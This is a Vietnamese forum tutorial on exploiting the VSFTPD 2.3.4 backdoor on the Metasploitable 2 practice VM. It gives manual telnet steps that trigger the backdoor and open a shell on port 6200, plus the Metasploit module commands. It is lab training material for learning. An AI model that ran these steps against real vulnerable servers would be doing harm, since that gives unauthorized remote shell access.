Hướng dẫn khai thác VSFTPD v2.3.4 trên Metasploitable 2

NgMSon

Well-Known Member
22/03/2017
748
669 bài viết
Hướng dẫn khai thác VSFTPD v2.3.4 trên Metasploitable 2
Để khai thác VSFTPD chúng ta có 2 cách như sau:
  • Khai thác bằng tay
  • Khai thác trên Metasloit
I. Khai thác bằng tay

Ở đây chúng ta sẽ khai thác lỗ hổng backdoor theo cách thủ công bằng cách kết nối với dịch vụ VSFTPD Metasploitable 2 và sử dụng một hình ảnh cười như tên người dùng để xác thực.

Sử dụng lệnh :

Mã:
telnet [Metasploitable IP] 21

( Trong đó Metasploit IP : IP / 21 : port - giữ nguyên )

Sau khi nhập xong chúng ta tiếp tục với 2 câu lệnh

Mã:
USER user

Mã:
PASS pass

* Chờ vài giây

Khi chúng ta kích hoạt nmap và quét cổng 6200, chúng ta sẽ thấy mã độc hại đã được thực hiện

1.PNG

Tiếp đó chúng ta kết nối với cổng 6200 bằng cách sử dụng lệnh sau:

Mã:
telnet [Metasploitable IP] 6200

2.PNG

Video hướng dẫn.


II. Khai thác trên Metasploit

Đâu tiên chúng ta mở msfconsole bằng lệnh sau:

Mã:
Msfconsole

Khi msfconsole đang chạy chọn khai thác backdoor bằng cách sử dụng lệnh sau:

Mã:
use exploit/unix/ftp/vsftpd_234_backdoor

Gõ lệnh sau để xem tùy chọn khai thác....

Mã:
Show options

3.PNG

Như vậy chúng ta có thể thấy chúng ta chỉ cần cung cấp một IP host từ xa và một cổng mà chúng ta để mặc định trên cổng 21. Bây giờ chúng ta có thể gõ chạy hoặc khai thác để khai thác các mục tiêu.

4.PNG
Video demo

 
Chỉnh sửa lần cuối bởi người điều hành:
Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
  • Thích
Reactions: username1312
Thanh you very much!
 
Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
Comment
Thẻ
metasploitable 2 vsftpd v2.3.4
Bên trên